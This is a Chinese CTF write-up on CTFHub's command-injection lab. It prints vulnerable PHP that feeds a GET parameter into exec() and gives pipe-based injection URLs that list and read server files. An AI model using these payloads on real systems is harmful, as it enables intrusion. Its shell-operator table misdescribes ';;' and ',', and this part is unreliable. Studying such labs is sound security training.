0x00 前言
CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。
文章来源:https://www.toymoban.com/news/detail-488818.html
0x01 题目描述
命令注入:
这是一个在线测试网络延迟的平台,路由器中经常会见到。无任何安全措施,尝试获取 flag 。
0x02 解题过程
Ⅰ检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了 ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$cmd = "ping -c 4 {$_GET['ip']}";
exec($cmd, $res);
}
?>
Ⅱ在输入框中搜索 127.0.0.1 执行一下看看,回显成功,可以正常执行。
Ⅲ在 url 中加上管道符进行测试,发现页面返回了两个网页的文件夹。
http://challenge-8d27f992c490a241.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls
Ⅳ直接访问带有数字的 php 文件,因为 index.php文件就是当前页面,可以直接排除。
http://challenge-8d27f992c490a241.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat 312721736210240.php
Ⅴ检查返回页面发现无回显,查看网页源代码发现此题 flag 。
0x03 Base64显示
当然,在解题过程中检查页面回显时,发现无回显并不是因为管道符不正确。而是因为在网页中,浏览器会将文本内容解析为 HTML 代码,并根据 HTML 代码生成相应的网页。如果你的文本中包含特殊字符,浏览器就会将这些特殊字符解析为 HTML 标签,导致文本内容无法在网页中正常显示。那么这时候你可以通过以 base64 编码形式进行解析,浏览器会输出 base64 编码后的文本进行输出,不执行 HTML 解析,所以可以在网页中正常显示。
关于 base64 的解题方法:
Ⅰ再使用一个 | 管道符号,将多个命令串联起来执行,将网页以 base64 编码返回到用户端。
http://challenge-8d27f992c490a241.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat%20312721736210240.php|base64
Ⅱ使用 base64 解码工具对密文进行解密,发现此题 flag 。
0x04 管道符号
管道符号是一个可以连接多个命令的特殊符号。在 Unix 和 Linux 系统命令行中经常使用,通常用于将一个命令的输出作为另一个命令的输入,从而实现多个命令的协同工作。
常见的管道符号:
符号 | 描述 |
| | 将一个命令的输出作为另一个命令的输入。 |
|| | 在一个命令失败时执行另一个命令。 |
; | 在同一行中运行多个命令。 |
;; | 在同一行中运行多个命令,但只有在前一个命令成功时才会运行后一个命令。 |
, | 按顺序执行多个命令,但只返回最后一个命令的结果。 |
&& | 在一个命令成功时执行另一个命令。 |
< | 将一个文件的内容作为输入传递给一个命令。 |
> | 将一个命令的输出重定向到一个文件中。 |
>> | 将一个命令的输出追加到一个文件的末尾。 |
0x05 参考文献
[1].William Shotts. Learning the Shell[EB/OL]. [2023-06-14]. https://linuxcommand.org/lc3_learning_the_shell.php.
0x06 总结
文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。文章来源地址https://www.toymoban.com/news/detail-488818.html
到了这里,关于CTFHub | 命令注入的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!